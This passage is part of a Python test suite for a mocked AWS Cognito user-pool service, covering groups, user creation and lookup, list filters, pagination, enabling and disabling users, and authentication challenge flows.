result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_list_groups(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.list_groups(UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_delete_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected with pytest.raises(ClientError) as cm: conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_add_user_to_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) # should there be an assertion here? @mock_cognitoidp def test_list_users_in_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) @mock_cognitoidp def test_list_users_in_group_ignores_deleted_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) username2 = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username2) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username2, GroupName=group_name ) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username2) @mock_cognitoidp def test_admin_list_groups_for_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_with_username_attribute(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_ignores_deleted_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) group_name2 = str(uuid.uuid4()) conn.create_group(GroupName=group_name2, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name2 ) conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name2) @mock_cognitoidp def test_admin_remove_user_from_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) @mock_cognitoidp def test_admin_create_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should_not.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(3) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) _verify_attribute("email", username) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_incorrect_username_attribute_type_fails(): conn = boto3.client("cognito-idp", "us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal("Username should be either an email or a phone number.") @mock_cognitoidp def test_admin_create_user_with_existing_username_attribute_fails(): conn = boto3.client("cognito-idp", "us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) with pytest.raises(ClientError) as ex: username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("UsernameExistsException") err["Message"].should.equal("test@example.com") @mock_cognitoidp def test_admin_create_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) password = "Passw0rd!" user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=False )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("UNCONFIRMED") conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username,) user["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_admin_resend_invitation_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.false @mock_cognitoidp def test_admin_resend_invitation_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], MessageAction="RESEND", ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) @mock_cognitoidp def test_admin_get_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "thing", "Value": value}, {"Name": "phone_number", "Value": "+123456789"}, ], ) # verify user can be queried by email result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify user can be queried by phone number result = conn.admin_get_user(UserPoolId=user_pool_id, Username="+123456789") result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") # verify that the generate user sub is a valid UUID v4 [user_sub] = [ attr["Value"] for attr in result["UserAttributes"] if attr["Name"] == "sub" ] uuid.UUID(user_sub) # verify user should be queried by user sub result = conn.admin_get_user(UserPoolId=user_pool_id, Username=user_sub) result["Username"].should_not.equal(username) result["UserAttributes"].should.have.length_of(4) _verify_attribute("phone_number", "+123456789") _verify_attribute("email", "test@example.com") @mock_cognitoidp def test_admin_get_missing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_get_missing_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_get_user(): conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") result = conn.get_user(AccessToken=outputs["access_token"]) result["Username"].should.equal(outputs["username"]) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) for key, value in outputs["additional_fields"].items(): _verify_attribute(key, value) @mock_cognitoidp def test_get_user_unknown_accesstoken(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.get_user(AccessToken="n/a") err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Invalid token") @mock_cognitoidp def test_list_users(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) username_bis = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username_bis) user0_username = "user0@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=user0_username, UserAttributes=[{"Name": "phone_number", "Value": "+48555555555"}], ) # checking Filter with prefix operator result = conn.list_users(UserPoolId=user_pool_id, Filter='phone_number ^= "+48"') result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(user0_username) # empty value Filter should also be supported result = conn.list_users(UserPoolId=user_pool_id, Filter='family_name=""') result["Users"].should.have.length_of(0) @mock_cognitoidp def test_list_users_incorrect_filter(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username = foo") _assert_filter_parsing_error(exc) with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter="username=") _assert_filter_parsing_error(exc) def _assert_filter_parsing_error(exc): err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Error while parsing filter") @mock_cognitoidp def test_list_users_invalid_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.InvalidParameterException) as exc: conn.list_users(UserPoolId=user_pool_id, Filter='custom:foo = "bar"') err = exc.value.response["Error"] assert err["Code"].should.equal("InvalidParameterException") assert err["Message"].should.equal("Invalid search attribute: custom:foo") @mock_cognitoidp def test_list_users_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username) def _verify_attribute(name, v): attr = [a for a in result["Users"][0]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("email", username) username_bis = "test2@uexample.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) uuid.UUID(result["Users"][0]["Username"]) _verify_attribute("email", username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) _verify_attribute("email", username_bis) @mock_cognitoidp def test_list_users_inherent_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) # create a confirmed disabled user client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] disabled_user_username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=disabled_user_username) conn.confirm_sign_up( ClientId=client_id, Username=disabled_user_username, ConfirmationCode="123456" ) conn.admin_disable_user(UserPoolId=user_pool_id, Username=disabled_user_username) # filter, filter value, response field, response field expected value - all target confirmed disabled user filters = [ ("username", disabled_user_username, "Username", disabled_user_username), ("status", "Disabled", "Enabled", False), ("cognito:user_status", "CONFIRMED", "UserStatus", "CONFIRMED"), ] for name, filter_value, response_field, response_field_expected_value in filters: result = conn.list_users( UserPoolId=user_pool_id, Filter='{}="{}"'.format(name, filter_value) ) result["Users"].should.have.length_of(1) result["Users"][0][response_field].should.equal(response_field_expected_value) @mock_cognitoidp def test_get_user_unconfirmed(): if settings.TEST_SERVER_MODE: raise SkipTest("Cant patch attributes in server mode.") conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") backend = moto.cognitoidp.models.cognitoidp_backends["us-west-2"] user_pool = backend.user_pools[outputs["user_pool_id"]] user_pool.users[outputs["username"]].status = "UNCONFIRMED" with pytest.raises(ClientError) as ex: conn.get_user(AccessToken=outputs["access_token"]) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("username") @mock_cognitoidp def test_list_users_returns_limit_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") @mock_cognitoidp def test_list_users_returns_pagination_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") next_token = result["PaginationToken"] result_2 = conn.list_users( UserPoolId=user_pool_id, Limit=max_results, PaginationToken=next_token ) result_2["Users"].should.have.length_of(max_results) result_2.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_list_users_when_limit_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = user_count + 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(user_count) result.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_admin_disable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_disable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_enable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_enable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_delete_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_admin_delete_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") def authentication_flow(conn, auth_flow): username = str(uuid.uuid4()) temporary_password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, UserAttributes=[{"Name": user_attribute_name, "Value": user_attribute_value}], ) result = conn.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow=auth_flow, AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password result["ChallengeName"].should.equal("NEW_PASSWORD_REQUIRED") result["Session"].should_not.be.none # This sets a new password and logs the user in (creates tokens) new_password = str(uuid.uuid4()) result = conn.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": new_password}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none return { "user_pool_id": user_pool_id, "client_id": client_id, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "username": username, "password": new_password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: authentication_flow(conn, auth_flow) def user_authentication_flow(conn): username = str(uuid.uuid4()) password = 